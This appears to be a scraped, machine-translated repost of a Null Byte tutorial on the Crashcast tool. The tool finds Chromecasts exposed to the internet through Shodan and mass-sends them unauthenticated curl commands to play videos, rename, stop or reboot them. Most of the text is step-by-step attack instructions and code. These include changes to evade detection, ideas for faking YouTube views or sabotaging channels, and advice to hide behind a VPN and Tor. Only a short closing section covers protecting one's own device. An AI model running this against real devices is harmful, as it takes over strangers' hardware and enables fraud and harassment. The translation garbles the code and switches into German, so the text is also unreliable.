قالب وردپرس درنا توس
Home / Tips and Tricks / How to Collapse a YouTube Botnet Using Chromecasts «Null Byte :: WonderHowTo

How to Collapse a YouTube Botnet Using Chromecasts «Null Byte :: WonderHowTo



Imagine playing a video instantly on hundreds of thousands of devices around the world. It's absolutely possible, as long as all of these devices have a Chromecast connected. When Chromecasts are exposed to the Internet, hackers can add them to a botnet that can play YouTube videos at will. The "attack" is made even easier by a simple Python program called CrashCast.

In general, the Internet of Things market is faced with the mystery of comfort and security. Often IoT companies are on the side of convenience because the customer needs to like the product so much that he can buy it before he has to worry about security – if at all. That's why Google compromised security on the Chromecast.

When a Google Chromecast is connected to a TV or screen, any device on the same network can easily stream (or "convert") or view videos and other media on that TV. To make this possible, it has a simple unauthenticated API (Application Programming Interface), which is generally okay, provided there are no malicious actors on the local network. However, the main problem arises when these devices are unintentionally exposed to the Internet.

With so many devices left open, hackers like TheHackerGiraffe and j3ws3r inevitably come along and take advantage of them. You may know the originators of the PewDiePie propaganda videos in early 2019. But how did they actually perform the hack?

GossiTheDog / Twitter

It's incredibly easy for Chromecast devices to redirect their ports to the Internet. This means that hackers can use and abuse them as if they were on their local networks. And here's where the whole Chromecast convenience thing comes from to bite Google in the ass.

Cast All the Things allows hackers to exploit a Chromecast, but how do you scale it to thousands, like the PewDiePie hack? Use Shodan, which continuously scans the Internet for IP addresses, available ports, and other distinctive information. Then Shodan only has to be instructed to find Chomecast devices, and all found devices will be displayed.

Amazon Test Equipment: Google Chromecast (3rd Generation)

To make matters easier, GitHub User 649 has created a Python program called Chrashcast. It uses the Shodan API to search for devices and then automatically sends the correct mail request to each IP address. In addition, it offers a few other actions than just playing a video, such as closing the YouTube app, renaming the device, restarting, and quitting the splash screen. Although we do not recommend that you actually do this, let's see how a hacker (in our scenario you and me) would hack.

Step 1: Get a Shodan API Key

The First Getting started requires a Shodan API key because, unlike Google, it requires authentication for the API. If you are new to Shodan, check out our manual for how to use the API to find susceptible devices.

First, navigate to the Shodan registration page and create an account. While Shodan is completely free for our purposes, when registering for some additional perks, be sure to access a .edu or .ac.uk email address . Never forget to check your emails and confirm your registration.

After creating an account, go to your account page and copy the long string of letters and numbers named "API key". We'll need that later when we do a crashcast. Never give this key to others – treat it like a password, because that's what it is, a password for the Shodan API. If at any point you believe it has been compromised, you can click the Reset API Key button to generate a new one.

Attack is useful

When selecting a clip, you can choose any YouTube video. Any Chromecast device that plays this video will be considered a unique view. This opens up some exciting use cases for crashcast. Your first thought might be that you could use this to give each video 200,000 simple views. That could be worth a lot of money, considering that 5,000 calls can cost between $ 19 and $ 40. However, there are some issues with this use because it violates YouTube's Terms of Use to use or buy fake views.] It is unclear whether YouTube logs the data that would be required to detect all of these views from Chromecast Devices, but YouTube can see from the engagement that they are not human. For example, we know that YouTube logs metrics such as the number of views, the time watched, likes, dislikes, and comments. When these Chromecast devices play a video, they completely watch it from start to finish and do nothing else at all. As you can imagine, it looks pretty suspicious when a video has 200,000 views, no comments, no likes and no dislikes.

Incidentally, this opens up another attack mechanism where a hacker may use compromised Chromecast devices for immediate results. Boost on a specific YouTube channel, report that channel, and let it use View Bots and block or demonize fake views. Smaller YouTube channels with fewer than 100,000 subscribers would be particularly vulnerable to such an attack, as the number of vulnerable Chromecast devices is significantly higher than the number of legitimate viewers who would be their channel.

Amazon testing equipment: Google Chromecast Ultra

Whether you're playing propaganda videos, pumping views into a video, or destroying a YouTube channel, the YouTube video ID will be sent to the Chromecast Devices needed. We recommend doing this only on equipment that you own or have agreed to be part of your experiment, and only for an educational experience. However, this will prove difficult as Shodan will arbitrarily grab them. To be extra safe, just follow the instructions to see how a hacker would execute the hack.

Step 3: Get YouTube Video ID

Open the video in your favorite web browser, such as Chrome or Firefox. Now you can copy everything to "youtube.com/watch?v=" from the URL bar or click the "Share" button below the video player.

If you used the Share button, copy everything to "youtu.be/" to get the Video ID. That's the best way to ensure that you get a clean Video ID. Note that you can select the check box next to "Start at" and set a specific time within the video from which to start playback.

If you can not decide On a video, there's a little Easter egg in Chashcast. Look at the Chrashcast Code in lines 97 and 98. If no Video ID is specified, by default oHg5SJYRHA0 will play, which, as you may have guessed, is a RickRoll video.

  if (option == 1):
video = input ("[▸] Enter the YouTube video ID for mass playback (the string after v =):") or "oHg5SJYRHA0" 

Step 4: Install dependencies

Now we have our Shodan API and our video ID, the only thing left is to make sure we have some dependencies and install crashcast. The first thing you want to install is Python 3, the language Crashcast is written in, and pip, a library downloader for Python. Open the command line and call it with sudo apt-get install . You may need to enter y and to confirm the downloads.

  ~ $ sudo apt-get install python3
~ $ sudo apt-get install python3-pip 

After installing pip you can install the Shodan library with pip3.

  ~ $ pip3 install shodan

Collect Shodan
Download from https://files.pythonhosted.org/packages/12/a6/d56c10c6e12bb0438c2f9f100989b262a7a9845a722770e245361f4d837e/shodan-1.13.0.tar.gz (46kB)
100% | ████████████████████████████████ | 51 kB 639 kB / s
Prerequisite already met: XlsxWriter in / usr / lib / python3 / dist packages (by shodan) (1.1.2)
Prerequisite already fulfilled: click in / usr / lib / python3 / dist-packages (by shodan) (7.0)
Collect Click Plugins (by shodan)
Download from https://files.pythonhosted.org/packages/e9/da/824b92d9942f4e472702488857914bdd50f73021efea15b4cad9aca8ecef/click_plugins-1.1.1-py2.py3-none-any.whl
Requirement already met: colorama in / usr / lib / python3 / dist packages (by shodan) (0.3.7)
Requirement already met: Requirements> = 2.2.1 in / usr / lib / python3 / dist packages (by shodan) (2.21.0)
Building wheels for collective packaging: Shodan
Runs setup.py bdist_wheel for shodan ...
Filed in directory: /root/.cache/pip/wheels/9f/a4/b7/ba936c98b7222efdfffa84a3534e6f67c88783ce25785d0582
Shodan successfully built
Install collected packages: click-plugins, shodan
Successfully installed click-plugins-1.1.1 shodan-1.13.0 

Curl is used to issue commands to Chromecast devices. Download the next one if you do not already have it. Enter y to continue when prompted.

  ~ $ sudo apt-get install curl

Read package lists ... Done
Create dependency tree
Status information is read ... Done
The following packages were automatically installed and are no longer needed:
glusterfs-common guile-2.0-libs libacl1-dev libattr1-dev libbind9-160 libboost-atomic1.62.0 libboost-chrono1.62.0 libboost-date-time1.62.0
libboost-filesystem1.62.0 libboost-iostreams1.62.0 libboost-program-options1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
libboost-serialization1.62.0 libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.62.0 libboost-test1.67.0
libboost-thread1.62.0 libboost-timer1.62.0 libboost-timer1.67.0 libcephfs1 libcgal13 libcharls1 libdee-1.0-4 libdns1102 libenca0 libexempi3
libfcgi-bin libfcgi0ldbl libgeos-3.7.0 libgfchangelog0 libgfdb0 libglusterfs-dev libgmime-3.0-0 libgtk2-perl libhunspell-1.6-0 libirs160
libisc169 libisccc160 libisccfg160 libjemalloc1 liblouis16 liblvm2app2.2 liblvm2cmd2.02 liblwgeom-2.5-0 liblwgeom-dev liblwres160
libmozjs-52-0 libnfs11 libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libpango-perl libperl5.26 libpoppler74 libprotobuf-lite10
libprotobuf10 libpyside1.2 libpython3.6 libpython3.6-minimal libpython3.6-stdlib libqca2 libqca2-plugins libqgis-analysis2.18.28
libqgis-core2.18.24 libqgis-core2.18.28 libqgis-customwidgets libqgis-gui2.18.24 libqgis-gui2.18.28 libqgis-networkanalysis2.18.24
libqgis-networkanalysis2.18.28 libqgis-server2.18.28 libqgispython2.18.24 libqgispython2.18.28 libqtwebkit4 libqwt6abi1 libradare2-2.9
librdmacm1 libre2-4 libsane-extras libsane-extras-common libsfcgal1 libshiboken1.2v5 libspatialindex4v5 libspatialindex5 libtbb2 libunbound2
libxapian30 libzeitgeist-2.0-0 openjdk-10-jdk openjdk-10-jdk-headless openjdk-10-jre php7.2-mysql python-anyjson
python-backports.ssl-match-hostname python-capstone python-couchdbkit python-cycler python-http-parser python-jwt python-kiwisolver
python-libemu python-matplotlib python-matplotlib2-data python-nassl python-owslib python-pam python-pyproj python-pyside.qtcore
python-pyside.qtgui python-pyside.qtnetwork python-pyside.qtwebkit python-pyspatialite python-qgis python-qgis-common python-qt4-sql
python-restkit python-shaped python-socketpool python-subprocess32 python3-jwt python3-prettytable python3.6 python3.6-minimal qt4-designer
ruby-dm-serializer ruby-faraday ruby-geoip ruby-libv8 ruby-ref ruby-therubyracer x11proto-dri2-dev x11proto-gl-dev zeitgeist-core
Use & sudo apt autoremove & # 39; to remove it.
The following additional packages will be installed:
libcurl4
The following packages are being updated:
Curls libcurl4
2 updated, 0 reinstalled, 0 removed and 539 not updated.
Requires 0 B / 595 kB of archives.
After this process, 0 B of additional memory is used.
Would you like to continue? [Y/n] y
Read change logs ... Done
(Database is being read ... 421783 Files and directories are currently installed.)
Preparing to unpack ... / curl_7.64.0-3_amd64.deb ...
Unpack Curl (7.64.0-3) via (7.64.0-1) ...
Unpacking is being prepared ... / libcurl4_7.64.0-3_amd64.deb ...
Unzip Libcurl4: amd64 (7.64.0-3) via (7.64.0-1) ...
Setting up libcurl4: amd64 (7.64.0-3) ...
Setting up Curl (7.64.0-3) ...
Processing trigger for man-db (2.8.5-2) ...
Triggers for libc-bin (2.28-8) are being processed ... 

Finally, clone the Chrashcast Github repository.

  ~ $ git clone https://github.com/649/Crashcast-Exploit.git

Cloning in & # 39; crashcast exploit & # 39; ...
remote: list objects: 38, done.
remote: count objects: 100% (38/38), done.
remote: Compress objects: 100% (29/29), done.
Remote: A total of 38 (delta 17), reused 29 (delta 8), pack-reused 0
Unpack objects: 100% (38/38), done. 

Step 5: Change crashcast to be less recognizable (optional)

Now you can run crashcast. However, the code is annoying: There is no delay between sending commands to each Chromecast, which makes almost simultaneous actions on all devices found on Shodan.

For example, when you play a video, Chomecast runs, and devices all over the world would play it all within a few minutes of each other. While this is perfect if you want everyone to be restarted, or if a hacker wants to disable a specific YouTube channel, it may be less desirable if you try to give your own YouTube videos some additional views. Fortunately, it's not that hard to put a little delay into the program as it goes through the list of IP addresses.

First, go to the Crashcast Exploit folder and open the program with Nano or another text editor.

  ~ $ cd crashcast exploit
~ / Crashcast = Exploit $ sudo nano -c Crashcast.py 

From there we need to add some lines of code. The first is to import random which we use to generate a random number of seconds for waiting.

  from random Randint imports look like this: 

  # - encoding: utf8 -
#! / usr / bin / env python3
Import Sys, OS, Time, Shodan
from the occasional import edge
from pathlib import path
from the contextlib import contextmanager, redirect_stdout

starttime = time.time () 

Next, use the arrow keys to scroll down two-thirds of the page and look for lines 136-137. Add a sleep timer in between.

  time.sleep (randint (1337, 5000) / 1000.0) 

It should look like it is shown below. Picking is very important in Python, so make sure it matches the if statement.

  ...

if active.startmit (? y?):
if saveme.startswith (& # 39; y & # 39;):
for i in ip_array:
time.sleep (randint (1337, 5000) / 1000.0)
if (option == 1):
print (& # 39; [+] Send a command to play a video to Chromecast (% s) & # 39;% (i))
with suppress_stdout ():
os.popen ("curl-h" content type: application / json "http: //% s: 8008 / apps / YouTube -X POST -d" v =% s "& # 39;% (i, video ))
elif (option == 2):
print (& # 39; [+] Sending the YouTube command to quit Chromecast (% s) & # 39;% (i))
with suppress_stdout ():
os.popen ("curl-h" content type: application / json "http: //% s: 8008 / apps / YouTube -X DELETE & # 39;% (i))
elif (option == 3):
print (& # 39; [+] Sending the command to rename the device to Chromecast (% s) & # 39;% (i))
with suppress_stdout ():
os.popen ("curl-Lv -H" content type: application / json "--data-raw " {"name": "% s"}  # 39; http: //% s: 8008 / setup / set_eu $
elif (option == 4):
print (& # 39; [+] Send Chromecast Shutdown Command to Chromecast (% s) & # 39;% (i))
with suppress_stdout ():
os.popen (& curl -X DELETE http: //% s: 8008 / ChromeCast & # 39;% (i))
elif (option == 5):
print (& # 39; [+] Send command to restart your device to Chromecast (% s) & # 39;% (i))
with suppress_stdout ():
os.popen ("curl -H" content type: application / json "http: //% s: 8008 / setup / reboot -d " {"params": "now"}  & # 39 ; -X POST & # 39;; [19659034] Next do the same with lines and 159-160. 

  time.sleep (randint (1337, 5000) / 1000.0) 

This would look like this:

  ...

otherwise
Result in results ['matches']:
time.sleep (randint (1337, 5000) / 1000.0)
if (option == 1):
print (& # 39; [+] Send video playback command to Chromecast (% s) & # 39;% (result ['ip_str'])
with suppress_stdout ():
os.popen ("curl-h" content type: application / json "http: //% s: 8008 / apps / YouTube -X POST -d" v =% s "& # 39;% (result [&]; # 39; ip $
elif (option == 2):
print (& # 39; [+] Sending the YouTube command to quit Chromecast (% s) & # 39;% (Result ['ip_str'])
with suppress_stdout ():
os.popen ("curl-h" content type: application / json "http: //% s: 8008 / apps / YouTube -X DELETE"% (result ['ip_str'])
elif (option == 3):
print (& # 39; [+] Sending the command to rename the device to Chromecast (% s) & # 39;% (Result ['ip_str'])
with suppress_stdout ():
os.popen ("curl-Lv -H" content type: application / json "--data-raw " {"name": "% s"}  # 39; http: //% s: 8008 / setup / set_eu $
elif (option == 4):
print (& # 39; [+] Send Chromecast Command to Stop Chromecast (% s) & # 39;% (Result ['ip_str'])
with suppress_stdout ():
os.popen (& curl -X DELETE http: //% s: 8008 / ChromeCast & # 39;% (Result ['ip_str'])
elif (option == 5):
print (& # 39; [+] Sending Reboot Device Command to Chromecast (% s) & # 39;% (Result ['ip_str'])
with suppress_stdout ():
os.popen ("curl -H" content type: application / json "http: //% s: 8008 / setup / reboot -d " {"params": "now"}  & # 39 ; -X POST & # 39;; [19659034] You can think of the sleep function as a timer: This line gets a random number between 1,337 and 5,000 that represents a time in milliseconds divided by 1,000 and converted in seconds. You can use 1,337 and For example, 10,000 would be 10 seconds. 

When finished, press . Ctrl x to finish nano, then to save the changes.

Step 6: Execute Crashcast

Before you run Crashcast, note that this is a legally gray area You should do so at your own risk If the devices are on the Internet, this does not mean that you are authorized to use them, even if If you do this, your country may not be located in the country where the Chromecast is located in.

Start Crashcast with Python.

  ~ $ python3 Crashcast.py

██████╗██████╗ ██████╗██████╗ ███████╗██╗ ██╗ ███╗ █████╗ ████╗████████╗
██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██╔════╝██╔══██ ╗██╔══██╗██╔════╝██║ ═██╗██╔════╝╚══██╔══╝
██║ ██║ ██████╔╝███████║███████╗███████║██║ ███╗
██║ ██║ ██╔══██╗██╔══██║╚════██║██╔══██║██║ ═██║
╚██████╗██║ ╚██████╗██║ ██║███████║██║ ██║╚██████╗██║ ██║╚██████╗██║ █████║ █████║
╚═════╝╚═╝ ╚═════╝╚═╝ ╚═╝ ╚═╝ ═══╝ ═══╝

Copyright: @ 037
Version: 2.0

####################################### DISCLAIMER ########## ##############################
| ChrashCast is a tool that lets you use Shodan.io to find thousands of vulnerable users
| Chromecast devices. You can then use the same devices to bulk video
| Restart the device, set a new device name, and quit Apps. It will be a simple cURL | used
| Command to execute the specified command on all vulnerable Chromecast devices. This |
| Exploit only works because people have decided that leaving their device is a good idea
| exposed to the entire Internet. Think again. |
####################################### WARNING ######## ##################################
| I am NOT responsible for any damage or crime caused by the use of this tool. |
| Use this tool at your own risk. It is ONLY a proof-of-concept for research. |
################################################## ###################################### 

Suppose this is the first time you run Run the program, insert your Shodan API key from before, when prompted, and then enter . Then check if you want to use Shodan with y and Enter . Last, save the results with y and Enter and delete them locally with n and Enter .

Now select the type of exploit you want to use from the menu, enter the number and press Enter .

  [*] Please enter a valid Shodan.io API key: ████████████████████████
[~] File written: ./api.txt

[*] Are you using the Shodan API to search for affected Chromecast devices? : y

[~] Check the Shodan.io API key: ████████████████████████
[✓] API key authentication: SUCCESS
[~] Number of Chromecast devices: 196879

[*] Save results for later use? : y
[~] File written: ./chromecast.txt

[*] Do you want to use locally stored Shodan data? : n
##################################### CHOICES ########## # #############################
| 1. Mass playback of YouTube videos: Unreliable, may not work. Requires only YT Video ID. |
| 2. Close YouTube App: Ends the YouTube process. |
| 3. Rename Chromecast Device: Assigns the device a newly defined SSID name. |
| 4. Stop Chromecast: Stops the Chromecast Home screen. |
| 5. Restart Chromecast: Chromecast just restarts. |
################################################## ######################################
[*] Select option (1-5): 1

[*] Enter the YouTube video ID for mass playback (the string after v =): F2HH7J-Sx80 

For the video option, you can now insert the video ID from step 3 and enter ]. The list of all IP addresses to be bombarded with requests is displayed.

  [+] Chromecast device (73) | IP: ███.███.██.██ | Operating System: None | ISP: Korea Telecom |
[+] Chromecast device (74) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (75) | IP: ███.███.██.██ | Operating System: None | ISP: Bredband i Kristianstad AB |
[+] Chromecast device (76) | IP: ███.███.██.██ | Operating System: None | ISP: Fastweb |
[+] Chromecast device (77) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (78) | IP: ███.███.██.██ | Operating System: None | ISP: Korea Telecom |
[+] Chromecast device (79) | IP: ███.███.██.██ | Operating System: None | ISP: LG DACOM Corporation |
[+] Chromecast device (80) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (81) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (82) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (83) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (84) | IP: ███.███.██.██ | Operating System: None | ISP: Hoshin Multimedia Center |
[+] Chromecast device (85) | IP: ███.███.██.██ | Operating System: None | ISP: Mobile Services Latvia |
[+] Chromecast device (86) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (87) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (88) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (89) | IP: ███.███.██.██ | Operating System: None | ISP: Korea Telecom |
[+] Chromecast device (90) | IP: ███.███.██.██ | Operating System: None | ISP: Telefonica de Espana |
[+] Chromecast device (91) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (92) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (93) | IP: ███.███.██.██ | Operating System: None | ISP: Frontier Communications |
[+] Chromecast device (94) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (95) | IP: ███.███.██.██ | Operating System: None | ISP: LG DACOM Corporation |
[+] Chromecast device (96) | IP: ███.███.██.██ | Operating System: None | ISP: Retel Jsc. |
[+] Chromecast device (97) | IP: ███.███.██.██ | Operating System: None | ISP: FORTHnet SA |
[+] Chromecast device (98) | IP: ███.███.██.██ | Operating System: None | ISP: LG DACOM Corporation |
[+] Chromecast device (99) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |
[+] Chromecast device (100) | IP: ███.███.██.██ | Operating System: None | ISP: Lg Powercomm |

[*] Are you ready to play YouTube videos in series (F2HH7J-Sx80)? : y 

I'd like to point out a limitation on the Shodan API - it can not differentiate between legitimate Chromecast devices and honeypots designed to emulate them. Therefore, at least some of the IP addresses in this list are necessarily honeypots. This means that you should take the necessary precautions, eg. For example, using a VPN and Tor if you are not already doing so. Otherwise, you might be ashamed on Twitter .

In both cases, when you are ready to execute the attack, you execute the last y and Enter . And that's how you've used thousands of Chromecast devices.

Step 7: Protect your own Chromecast.

If you have your own Chromecast, open the router management page. This should be about 192.168.1.1. Refer to your router model's guide for identification information. Look for a port forwarding setting there and look for ports 8008, 8443, and 8009. If you see any of the forwarded ports, stop them and remove them.

Otherwise, you may want to disable Universal Plug and Play (UPnP) settings on the router. The original PewDiePie hackers believed that UPnP could be part of the problem, but others denied this . Solange die drei Ports nicht weitergeleitet werden, sollten Sie als Kätzchen in Sicherheit sein.

Danke fürs Lesen! Wenn Sie Fragen haben, können Sie diese hier in den Kommentaren oder auf Twitter @The_Hoid stellen.

Nicht verpassen: Zuordnen von Netzwerken und Herstellen einer Verbindung zu erkannten Geräten mithilfe Ihres Telefons [19659075] Titelfoto von Justin Meyers / Null Byte; Screenshots von Hoid / Null Byte




Source link